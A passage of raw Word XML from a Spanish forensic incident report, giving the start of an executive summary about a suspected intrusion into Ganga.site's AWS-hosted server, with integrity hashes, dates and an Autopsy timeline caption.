AAGRycy9kb3ducmV2LnhtbFBLAQIt&#10;ABQABgAIAAAAIQCqJg6+vAAAACEBAAAZAAAAAAAAAAAAAAAAANbnAABkcnMvX3JlbHMvZTJvRG9j&#10;LnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAAMnoAAAAAA==&#10;">
                <v:shape id="Imagen 109" o:spid="_x0000_s1241" type="#_x0000_t75" style="position:absolute;width:26054;height:17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vZGyAAAAOEAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE+7bsIw&#10;FN0r9R+sW4mt2M0Q2oBB0CoIlqo8JNrtKr4kUePrKDYh/D0eKnU8Ou/ZYrCN6KnztWMNL2MFgrhw&#10;puZSw/GQP7+C8AHZYOOYNNzIw2L++DDDzLgr76jfh1LEEPYZaqhCaDMpfVGRRT92LXHkzq6zGCLs&#10;Smk6vMZw28hEqVRarDk2VNjSe0XF7/5iNfzsctza9Ue+Ok2+v/rLLfnE1Vrr0dOwnIIINIR/8Z97&#10;YzQkb+kkVSpOjo/iG5DzOwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDRDvZGyAAAAOEA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:imagedata r:id="rId265" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1242" type="#_x0000_t202" style="position:absolute;left:27006;top:4890;width:26054;height:6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8l1ywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasMw&#10;EITvhb6D2EIvJZHq4tA4UUKbtNBDesgPOS/WxjaxVkZSYuftq0Khx2Hmm2Hmy8G24ko+NI41PI8V&#10;COLSmYYrDYf95+gVRIjIBlvHpOFGAZaL+7s5Fsb1vKXrLlYilXAoUEMdY1dIGcqaLIax64iTd3Le&#10;YkzSV9J47FO5bWWm1ERabDgt1NjRqqbyvLtYDZO1v/RbXj2tDx8b/O6q7Ph+O2r9+DC8zUBEGuJ/&#10;+I/+MonL1TRXL3kGv5fSHZCLHwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDCM8l1ywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6DFCC31D" w14:textId="5AA6E8DE" w:rsidR="00F674A8" w:rsidRPr="00F11175" w:rsidRDefault="00F674A8" w:rsidP="00F674A8">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>63</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="156" w:name="_Toc155782630"/>
                        <w:r w:rsidRPr="00BF6506">
                          <w:t xml:space="preserve">Herramienta línea del Tiempo de </w:t>
                        </w:r>
                        <w:r>
                          <w:t>A</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF6506">
                          <w:t>utopsy.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="156"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La alteración de la Base de datos, después de la infección (31 de diciembre a las 06:25:02 UTC) con las sentencias encontradas, muestra una desecurización de la base de datos.</w:t>
      </w:r>
      <w:r w:rsidR="00E841F1" w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348F6A5E" w14:textId="77ED0457" w:rsidR="00F674A8" w:rsidRPr="00C4245F" w:rsidRDefault="00C4245F" w:rsidP="00C4245F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C4245F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00C4245F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C4245F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155782459 \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C4245F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00C4245F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C4245F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XX</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>I.</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detalle de línea del tiempo de Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4245F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C4245F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD31244" w14:textId="1B37BB4D" w:rsidR="00E64C85" w:rsidRDefault="00E64C85" w:rsidP="00E64C85">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc155782519"/>
      <w:r w:rsidRPr="00E64C85">
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E64C85">
        <w:t>Resumen ejecutivo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w14:paraId="584153B1" w14:textId="77777777" w:rsidR="007526BD" w:rsidRPr="007471D6" w:rsidRDefault="007526BD" w:rsidP="007526BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EFD0A6" w14:textId="116BD5FF" w:rsidR="009B4E6A" w:rsidRPr="005579DA" w:rsidRDefault="00B70C80" w:rsidP="007526BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESUMEN EJECUTIVO</w:t>
      </w:r>
      <w:r w:rsidR="007526BD" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> QUE FORMULA EL D. JOSE ENRIQUE RODRÍGUEZ GONZÁLEZ</w:t>
      </w:r>
      <w:r w:rsidR="007471D6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007526BD" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CON D.N.I. N.º XX.XXX.XXX-Y,</w:t>
      </w:r>
      <w:r w:rsidR="007471D6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CISO DE LA EMPRESA GANGA</w:t>
      </w:r>
      <w:r w:rsidR="0089535F" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007471D6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SITE,</w:t>
      </w:r>
      <w:r w:rsidR="007526BD" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOBRE EL SERVIDOR</w:t>
      </w:r>
      <w:r w:rsidR="007471D6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ALOJADO EN AMAZON WEB SERVICES</w:t>
      </w:r>
      <w:r w:rsidR="007526BD" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090B1C2" w14:textId="77777777" w:rsidR="007471D6" w:rsidRPr="005579DA" w:rsidRDefault="007471D6" w:rsidP="007471D6">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ANTECEDENTES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA68DA0" w14:textId="20F1FFEF" w:rsidR="007471D6" w:rsidRPr="005579DA" w:rsidRDefault="007471D6" w:rsidP="007471D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>La dirección de la empresa tiene serias sospechas, no probadas, de que han accedido a los sistemas de forma ilícita. Por lo que el gerente de la empresa , como CISO, que se compruebe si realmente han accedido, así como el método que han utilizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73344DEF" w14:textId="77777777" w:rsidR="000231FB" w:rsidRPr="005579DA" w:rsidRDefault="000231FB" w:rsidP="000231FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PROPÓSITO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E131FB" w14:textId="01EBBA31" w:rsidR="000231FB" w:rsidRPr="005579DA" w:rsidRDefault="000231FB" w:rsidP="000231FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dar a conocer a la </w:t>
      </w:r>
      <w:r w:rsidR="000342A5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dirección de la empresa</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre los sucesos ocurridos y evidencias encontradas.</w:t>
      </w:r>
      <w:r w:rsidR="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se ha procedido a realizar el análisis de</w:t>
      </w:r>
      <w:r w:rsidR="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> las capturas facilitadas de</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> memoria 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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del disco duro del dispositivo afectado con intención de hacer un seguimiento de los hechos ocurridos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36A4E6" w14:textId="77777777" w:rsidR="000231FB" w:rsidRPr="005579DA" w:rsidRDefault="000231FB" w:rsidP="000231FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INFORME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F51AD" w14:textId="65F337AF" w:rsidR="000231FB" w:rsidRPr="005579DA" w:rsidRDefault="000231FB" w:rsidP="000231FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A continuación, se enumeran los distintos indicio y elementos detectados en la captura de la memoria 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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del dispositivo investigado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7CAE6" w14:textId="09D46128" w:rsidR="000231FB" w:rsidRPr="005579DA" w:rsidRDefault="000231FB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se ha comprobado la integridad</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida.</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00617D2D" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de la captura de memoria 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617D2D" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> como de disco duro mediante hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos.</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617D2D" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de MD5 y SHA1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE0CC1" w14:textId="628B3321" w:rsidR="001B519C" w:rsidRPr="005579DA" w:rsidRDefault="00757B9C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se identifica como propietario del servidor como a la empresa Ganga</w:t>
      </w:r>
      <w:r w:rsidR="00A603CF" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.site</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A048D99" w14:textId="181E3185" w:rsidR="00757B9C" w:rsidRPr="005579DA" w:rsidRDefault="00A54058">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La fecha de instalación del sistema operativo es el 21 de diciembre de 2018 a las 12:04:49 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5A9D9F" w14:textId="0A960C54" w:rsidR="00A54058" w:rsidRPr="005579DA" w:rsidRDefault="00A54058">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se destaca del dispositivo investigado los siguientes elementos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28FB5A" w14:textId="6B6C1480" w:rsidR="00A54058" w:rsidRPr="005579DA" w:rsidRDefault="00A54058">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Máquina Virtual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A34ABC" w14:textId="2CF1C97B" w:rsidR="00A54058" w:rsidRPr="005579DA" w:rsidRDefault="00A54058">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alojado en servidores AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18564F85" w14:textId="07D21E9F" w:rsidR="00655295" w:rsidRPr="005579DA" w:rsidRDefault="00655295">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El ultimo acceso registrado fue el </w:t>
      </w:r>
      <w:r w:rsidR="005F6EDE" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3 de enero de 2019 a las </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>08:16:46 UTC</w:t>
      </w:r>
      <w:r w:rsidR="005F6EDE" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2ED2F" w14:textId="30947CF4" w:rsidR="00617D2D" w:rsidRPr="005579DA" w:rsidRDefault="005F6EDE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En l</w:t>
      </w:r>
      <w:r w:rsidR="00617D2D" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a memoria 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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> analizad</w:t>
      </w:r>
      <w:r w:rsidR="00617D2D" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>se detectan las siguientes evidencias</w:t>
      </w:r>
      <w:r w:rsidR="00617D2D" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
